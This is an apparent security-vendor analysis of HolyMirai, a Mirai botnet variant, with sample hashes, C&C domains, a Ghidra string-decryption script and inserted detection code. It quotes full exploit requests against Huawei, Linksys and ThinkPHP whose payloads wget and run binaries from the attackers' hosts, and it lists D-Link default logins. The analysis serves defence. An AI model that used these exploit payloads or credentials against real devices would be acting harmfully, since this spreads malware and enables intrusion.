The evolution of Mirai into HolyMirai

Avira Protection Labs, 8 months ago 6 min read

By October 2016, the Mirai botnet had infected over 500,000 IoT devices. The massive distributed denial of service (DDoS) attacks on the dynamic DNS provider Dyn and on several high-profile targets, including Krebs on Security, generated more than 1 Tbps of traffic. For many people around the world, internet services were temporarily disrupted.

This remarkable attack was carried out via unsecured, innocuous Internet-of-Things (IoT) devices like home routers, air-quality monitors, and personal surveillance cameras. And the IoT industry learnt a lesson; a lesson that it has yet to apply in practice.

Mirai botnets remain active today. However, the code has evolved into a new form, one that Avira researchers have named HolyMirai.

This blog presents a study of the core similarities, differences, and evolution between the original Mirai and its new variant, HolyMirai. A follow-up blog will describe a further evolution of HolyMirai along with new C&C servers.

Introduction

Avira develops threat intelligence for many applications. The Avira Protection Labs uses many techniques to develop this intelligence, not all of which are public. One method that is public is honeypots, and one of our honeypots targets IoT binaries.

The Avira Protection Labs IoT honeypot captures and identifies many new and unique forms of malware each day. The vast majority are modified variants of the original Mirai. This should not be surprising given how popular Mirai became after the leak of its source code, just a year after the original attack.

Among the recently captured pieces of malware, all of which are part of active botnets, we found seven samples containing the flashy string “compiled using cia holyc compiler”, a tongue-in-cheek reference to the HolyC programming language and its author, Terry A. Davis.

We wrote YARA rules to hunt on VirusTotal (VT) for samples containing the same string, and found 36 more variants. Given the author’s sense of humour, we decided to name the family HolyMirai.

Evolution: core findings and differences from the original Mirai

  1. Custom encryption method (same as MiraiCrush)
  2. Aggressive scanning
  3. Additional DDoS techniques
  4. Adoption of different exploits for targeted devices and lateral movement

As shown in the versions table below, the authors forgot to strip two samples before releasing them into the wild, namely those with the SHA-256 hashes

c25795c790a33c06ce48780a271db87035a4ad3a957766c7667a82758afecfde

and

cd2bd1f6387a9c01d58765e40cf69b37d5dad28e6fa5af01dde39a045dd4af08

As a result, both came with debugging information, which makes reverse engineering much easier. We selected these two samples as our primary targets, though we also considered other samples, especially where they differed from their parent version or were customized.

After looking into the HolyMirai samples, we observed significant similarities with the original Mirai code and with the Hakai malware, though with notable customized features and improvements.

General Analysis

In this section, we explain the features shared by all samples in our analysis set.

What is the deal with the flashy string?

As mentioned before, all samples contain the flashy string “compiled using cia holyc compiler”. This string is passed as the argument to inet_addr() to produce a bogus IP address for the C&C server, with the intent of misleading malware analysts.

As useless as it seemed, it was still a good hanger with which to classify the malware and hunt other variants.

Encryption method:

Although the encryption method seen in these samples differs from the original Mirai’s, it is the same routine previously observed in MiraiCrush. The only difference is the encryption key, which is 0xDEADDAAD instead of the 0xDEDEFFBA used by MiraiCrush.

Aggressive Scanning:

Below is a screenshot of the original Mirai source code. As its last line shows, a single scanner instance is started when the malware executes.

However, as shown in the screenshot below, HolyMirai instantiates multiple scanners (in this case 4 instances), making the scanning process much faster and more aggressive, eventually leading to the wider spread of the botnet.

Additional DDoS techniques:

In addition to the original Mirai attack methods, HolyMirai carries further DDoS methods, including:

  1. Christmas tree attack
  2. TCP URG SYN attack
  3. TCP ACK SYN attack
  4. TCP ALL attack (All TCP flags are set)
  5. Two random UDP attacks (the first version creates a random string of 1 to 31 characters, the second a random string of 100 to 800 characters)

First version: (screenshot)

Second version: (screenshot)

Exploits

HolyMirai has evolved over time. In this section, we present some exploits that we found in individual HolyMirai samples and that are not present in earlier versions.

CVE-2017-17215 – Huawei Home Device Upgrade exploit

Found in the sample with the SHA-256 hash d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e, this exploit targets Huawei home routers. It was also present in MiraiCrush.

Huawei Exploit

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g cnc.arm7plz.xyz -l /tmp/ggy -r /nbm; /bin/busybox chmod 777 * /tmp/ggy; /tmp/ggy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Note the payload:

/bin/busybox wget -g cnc.arm7plz.xyz -l /tmp/ggy -r /nbm;
/bin/busybox chmod 777 * /tmp/ggy;
/tmp/ggy huawei

Linksys “Moon” worm exploit

Found in the same sample (SHA-256 hash d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e), this exploit targets Linksys modems and was first seen in the “Moon” worm.

Linksys Exploit

POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.arm7plz.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1..

Note the payload:

cd /tmp;
rm -rf set.mpsl;
wget http://cnc.arm7plz.xyz/bins/set.mpsl;
chmod 777 set.mpsl;
./set.mpsl linksys

ThinkPHP 5.x RCE exploit

Found in the sample with the SHA-256 hash 3a49d1fdd9f19b8031a6c07ea8c8ffa92b2563864729a4cc8ec68f5a9f96d999, this exploits a remote code execution flaw in the ThinkPHP application framework.

ThinkPHP Exploit

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://cnc.junoland.xyz/bins/egg.x86;cat%20egg.x86%20>%20lzrd;chmod%20777%20lzrd;./lzrd%20thinkphp.x86 HTTP/1.1
Host: 127.0.0.1
User-Agent: Sefa
Accept: */*
Accept-Language: en-US,en;q=0.8
Connection: Keep-Alive

Note the payload:

cd /tmp;
wget http://cnc.junoland.xyz/bins/egg.x86;
cat egg.x86 > lzrd;
chmod 777 lzrd;
./lzrd thinkphp.x86
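The three requests above share one shape: a legitimate endpoint carrying an injected shell command in a single field. As an added detection example (not Avira's code or any HolyMirai code), the following inspector classifies captured requests against those three shapes and extracts the injected command; rule names, function names and the trimmed sample requests are constructed from the page's own request lines.

```python
# Added example, not Avira's code: classify captured HTTP requests against the
# three HolyMirai exploit shapes quoted above and pull out the injected command.
# Rule names and function names are constructed for this example.
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed inputs: the page's request lines and payloads with headers trimmed.
HUAWEI = ("POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\n\r\n"
          "<NewStatusURL>$(/bin/busybox wget -g cnc.arm7plz.xyz -l /tmp/ggy -r /nbm; "
          "/bin/busybox chmod 777 * /tmp/ggy; /tmp/ggy huawei)</NewStatusURL>")
LINKSYS = ("POST /tmUnblock.cgi HTTP/1.1\r\nHost: 192.168.0.14:80\r\n\r\n"
           "ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.arm7plz.xyz"
           "%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&ttcp_num=2")
THINKPHP = ("GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array"
            "&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://cnc.junoland.xyz/bins/egg.x86;"
            "chmod%20777%20lzrd;./lzrd%20thinkphp.x86 HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n")
BENIGN = "GET /index.php?s=/index/home HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"


def split_request(raw):
    """Return (method, path, query, body) from a raw HTTP/1.1 request."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    path, _, query = target.partition("?")
    return method, path, query, body


def classify(raw):
    """Return [(rule, injected_command)] for every HolyMirai exploit shape matched."""
    method, path, query, body = split_request(raw)
    hits = []
    # CVE-2017-17215: shell substitution inside the UPnP Upgrade URL fields
    if method == "POST" and path == "/ctrlt/DeviceUpgrade_1":
        m = re.search(r"<New(?:Status|Download)URL>\$\((.*?)\)</New", body, re.S)
        if m:
            hits.append(("huawei-cve-2017-17215", m.group(1)))
    # "Moon" worm style: backtick command in the ttcp_ip form field
    if method == "POST" and path == "/tmUnblock.cgi":
        ttcp_ip = parse_qs(body).get("ttcp_ip", [""])[0]   # also URL-decodes
        m = re.search(r"`(.*?)`", ttcp_ip, re.S)
        if m:
            hits.append(("linksys-tmunblock-rce", m.group(1)))
    # ThinkPHP 5.x: invokefunction routed to call_user_func_array
    q = unquote_plus(query)
    if path == "/index.php" and "invokefunction" in q and "call_user_func_array" in q:
        m = re.search(r"vars\[1\]\[\]=([^&]*)", q)
        hits.append(("thinkphp5-invokefunction-rce", m.group(1) if m else ""))
    return hits


if __name__ == "__main__":
    for name, req in (("huawei", HUAWEI), ("linksys", LINKSYS),
                      ("thinkphp", THINKPHP), ("benign", BENIGN)):
        print(name, classify(req))
```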

Targeted devices

In this section we present targeted attacks against specific vendors and devices.

  1. Huawei (exploit shown above)
  2. Linksys (exploit shown above)
  3. D-Link (exploit shown below)

Targeting D-Link:

The scanner module of the HolyMirai sample with the SHA-256 hash 153964ee69c1a5e8aa16eb454778baf2f3190ee539b05ca798710b1642cfc90a contains D-Link default credentials, which are not present in the original Mirai source code.

D-Link default usernames and passwords

Alphanetworks wrgg19_c_dlwbr_dir300
Alphanetworks wrgn49_dlob_dir600b
Alphanetworks wrgn23_dlwbr_dir600b
Alphanetworks wrgn22_dlwbr_dir615
Alphanetworks wrgnd08_dlob_dir815
Alphanetworks wrgg15_di524
Alphanetworks wrgn39_dlobhans_dir645
Alphanetworks wapnd03cm_dkbs_dap2555
Alphanetworks wapnd04cm_dkbs_dap3525
Alphanetworks wapnd15_dlob_dap1522b
Alphanetworks wrgac01_dlob.hans_dir865
Alphanetworks wrgn23_dlwbr_dir300b
Alphanetworks wrgn28_dlob_dir412
Alphanetworks wrgn39_dlob.hans_dir645_V1

Additional info

List of different HolyMirai variants:

Sample hash (SHA-256) Source Executable format Target architecture Debugging info C&C servers
0b109c4655284364e7f6d4cf53cbd483e06a3a8142a8be2968c1bf28229a04be Honeypot ELF 32-bit LSB executable ARM stripped netflux.r00ts.online
hulo.r00ts.online
1f4f47311e452bdffaf04fc64e5a6ea0c88ac04623c17faeed36ffe766b2511c Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
3b1599b7731bea8ec4c7f7297e0965439cb0e4c54643ca1441cd4678fab22d82 Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
4264a1d53c6c762722d633a74a7da85a0778f505704faf2e770c9a9e280dc284 Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
5dfed66ede83181c3eaac50f85947c4cb9995260d11c63bb049475371055001d Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
9342952ff6e71890989413bf4de1e650b39e828a36af9e3d2e3f20a0cf137d78 Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
f15262656758111846bdf4979618ea71038598c16c71b1203608a2c85e9d5fce Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
0395fa502eb566fcf6e4876c6fcbdd7f9fe043c625dcf41635a8b1501e7461c6 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
12676fda6b43c86befe47cf69ea4455e7849d660f8325c354480af22a140c5bb VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
153964ee69c1a5e8aa16eb454778baf2f3190ee539b05ca798710b1642cfc90a VirusTotal ELF 32-bit MSB executable MIPS stripped netflux.r00ts.online
hulo.r00ts.online
1bf7448da897a1d7774d24f6297b77c6322c9fda15224a44b1290729eac61982 VirusTotal ELF 32-bit LSB executable ARM stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
2397b846ac2aa7265990d4e792c236c94bdd8bd4ba3e2ce16b4135839a2870f5 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
2caef91f7bc4491fe5699eb7c74b689bdfd885f821872e2de6ce9df84e70d3fb VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
2ccfd60051294abccfb5aff42588126bee6a893991150cdbfe3e357ba319acc9 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
30b2167a0f1943c1315c7dd14698259d00b8d3fb18647a8cb03341d5190fda51 VirusTotal ELF 32-bit MSB executable Motorola m68k stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
378f6d836a202b32ca8795f7dc4c24dffb7f232bad5554b045b9b9e82034443e VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
3a49d1fdd9f19b8031a6c07ea8c8ffa92b2563864729a4cc8ec68f5a9f96d999 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped cnc.junoland.xyz
scan.junoland.xyz
48aabb4ac83cebe9aec6af359a2e10af0ed112fc3936f8c4149a3838e6dfc426 VirusTotal ELF 32-bit MSB executable MIPS stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
575a28ca439411a40d8cf0f381c6f0c1889a8a08627d2135ff28b9dfd8e2dc6c VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
6a651d67be24382c9328b6de7829dc861a6958ff38e4260abb35e16b8f60666a VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
6e533d390048e1bb3157c0aa6a429195698515cf2bcd99fb2276d202a2e6c2c4 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
6f8026820c63c92e610de15e771e8d00826bd5050a3c4b06210e23f6fc68868b VirusTotal ELF 32-bit LSB executable ARM stripped netflux.r00ts.online
hulo.r00ts.online
7854e35610ead6f1010ccd1858c6b6ecb19c34c149c6326c10e7016202767711 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
8851b330a6bf5d2efade40a0262553e2a57bc3d3416f4f29f9f7bd1e5634edcb VirusTotal ELF 32-bit MSB executable SPARC stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
8ca2c4c8236f159d55ee2160ed20bc69b51f93990898e6ecfea506ff3cdeca4a VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
8ca3f4dd7ad0d01f3cd6a34fa060af33c3c840ccf6f368f294f0e50f380ec52f VirusTotal ELF 32-bit LSB executable MIPS stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
93b75a6f4d1e6880d1dd08de14137a1685be0cf70dae05b89f74d3c83820a7ef VirusTotal ELF 32-bit LSB executable Intel 80386 stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
9b45260b5b5157a70dd7d8835b88b503f091f4ca1b64d7518843f41e14f986d7 VirusTotal ELF 32-bit MSB executable MIPS stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
9bf2754afc362510ece8cfaa6062c70e4aee001ab2fd011f7a01dc35399db495 VirusTotal ELF 32-bit LSB executable ARM stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
a07d2c5c94a8048205cd24cff34195e3eed1534044772386b7b94a9e84f8ea2c VirusTotal ELF 32-bit LSB executable ARM stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
aa4caeb4f22998fdb7bb5a77e6cb75f9ddc5f598902c5f4f26842d060af08a37 VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
aede29b4914344f00998d2e3183d005bee886a81f0e430536cf0a842ecdde4bd VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped netflux.r00ts.online
hulo.r00ts.online
b37d62fb74bf89921dbbdcea8bb8f5a85bc4b2bbf002146c651921bdbf96e745 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
c25795c790a33c06ce48780a271db87035a4ad3a957766c7667a82758afecfde VirusTotal ELF 32-bit LSB executable ARM with debug_info netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
ca957197780b9e40d550828024377888130735c31815716106b0be65b80c51f1 VirusTotal ELF 32-bit LSB executable MIPS stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
cd2bd1f6387a9c01d58765e40cf69b37d5dad28e6fa5af01dde39a045dd4af08 VirusTotal ELF 32-bit LSB executable ARM with debug_info drum.aydenjonza.xyz
storage.aydenjonza.xyz
d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
dc65a17134774b13b898af7af3197fdab765de8770d92fdf2967dc9d382b0a08 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
e226bc964e31fb835ea2ae5fcd697d16a6e693557bf46bda43d0bf71f151d6c1 VirusTotal ELF 32-bit LSB executable MIPS stripped netflux.r00ts.online
hulo.r00ts.online
e25521b6d5c974a8844d55a7f67b9ad6fc15129a7d6988695c01f25da06e9308 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped cnc.junoland.xyz
scan.junoland.xyz
e7f8389e88e6d336666ca9572829e88fddcdd2ceb532a305effaaff8514769cd VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
e9dfa336a668c6d33352860d9443062446af41239edb0c6a9ec49213a6713534 VirusTotal ELF 32-bit LSB executable MIPS stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz


List of C&C servers (all versions included; these are the hosts in the last column of the table above):


Ghidra script to decrypt strings:

# This script helps to extract and decrypt strings in HolyMirai
#@author Hamidreza Ebtehaj
#@category _NEW_
#@keybinding
#@menupath Tools.Misc.MiraiString
#@toolbar

# Run from the Ghidra script manager (Jython) with the cursor placed on the
# first byte of the encrypted string table.
number_of_hits = 100
xor_key = 0x4        # single-byte key applied to every byte of the table
start = currentAddress
# Encrypted entries are separated by 0x04 0x00 or 0x00 0x00 byte pairs
separators = list(findBytes(currentAddress, "\\x04\\x00", number_of_hits, 1))
separators += list(findBytes(currentAddress, "\\x00\\x00", number_of_hits, 1))
separators.sort()

num = 1
for off in separators:
    if start >= off:
        continue
    # Decrypting strings: XOR every byte between start and the next separator
    bts = getBytes(start, off.subtract(start))
    for i in range(len(bts)):
        bts[i] ^= xor_key
    # Java bytes are signed, so mask to 0..255 before formatting as hex
    hex_str = " ".join(["%02X" % (x & 0xFF) for x in bts])
    decoded = "".join(["%c" % x for x in bts if x < 0x80 and x > 0x1f])
    # print("%02x %s : %s %s" % (num, start, decoded, hex_str))
    print("%s" % decoded)
    # Getting next address: skip separator and padding bytes
    start = off
    while getByte(start) == 4 or getByte(start) == 0:
        start = start.next()
    num += 1
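The Ghidra script only runs inside Ghidra. As an added example that is not part of the original post or the Avira script, the plain Python below reproduces the same decoding offline and shows where xor_key = 0x4 comes from: it assumes HolyMirai folds its 32-bit key into one XOR byte the way the leaked Mirai table_init() does (k1 ^ k2 ^ k3 ^ k4), which the page does not show, but that fold of 0xDEADDAAD yields exactly 0x04. The function names and the sample table are constructed.

```python
# Added example, not Avira's or HolyMirai's code. Decodes a Mirai-style string
# table offline and shows how a 32-bit key collapses to the single XOR byte
# the Ghidra script above hard-codes as xor_key = 0x4.
# ASSUMPTION: the key is folded as in the leaked Mirai table_init()
# (k1 ^ k2 ^ k3 ^ k4); the page does not show HolyMirai's own routine.

HOLYMIRAI_KEY = 0xDEADDAAD   # key reported on the page for HolyMirai
MIRAICRUSH_KEY = 0xDEDEFFBA  # key reported on the page for MiraiCrush
SEPARATOR = b"\x04\x00"      # entry separator the Ghidra script searches for


def fold_key(key32):
    """XOR the four bytes of a 32-bit key into the byte actually applied."""
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (key32 >> shift) & 0xFF
    return k


def decrypt_entry(blob, key_byte):
    """XOR one entry and keep printable ASCII, as the Ghidra script does."""
    return "".join(chr(b ^ key_byte) for b in blob if 0x1F < (b ^ key_byte) < 0x80)


def decrypt_table(table, key32):
    """Split an encrypted table on the separator and decode every entry."""
    key_byte = fold_key(key32)
    entries = []
    for chunk in table.split(SEPARATOR):
        chunk = chunk.strip(b"\x00\x04")  # skip padding between entries
        if chunk:
            entries.append(decrypt_entry(chunk, key_byte))
    return entries


def build_table(strings, key32):
    """Constructed sample: encrypt strings into a table so the demo runs offline."""
    key_byte = fold_key(key32)
    enc = [bytes(c ^ key_byte for c in s.encode("ascii")) for s in strings]
    return SEPARATOR.join(enc) + SEPARATOR


if __name__ == "__main__":
    print("HolyMirai key byte:  0x%02X" % fold_key(HOLYMIRAI_KEY))   # 0x04
    print("MiraiCrush key byte: 0x%02X" % fold_key(MIRAICRUSH_KEY))  # 0x45
    sample = build_table(["/bin/busybox", "huawei", "thinkphp.x86"], HOLYMIRAI_KEY)
    print(decrypt_table(sample, HOLYMIRAI_KEY))
    # Decoding with the MiraiCrush key yields garbage, confirming the key change
    print(decrypt_table(sample, MIRAICRUSH_KEY))
```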
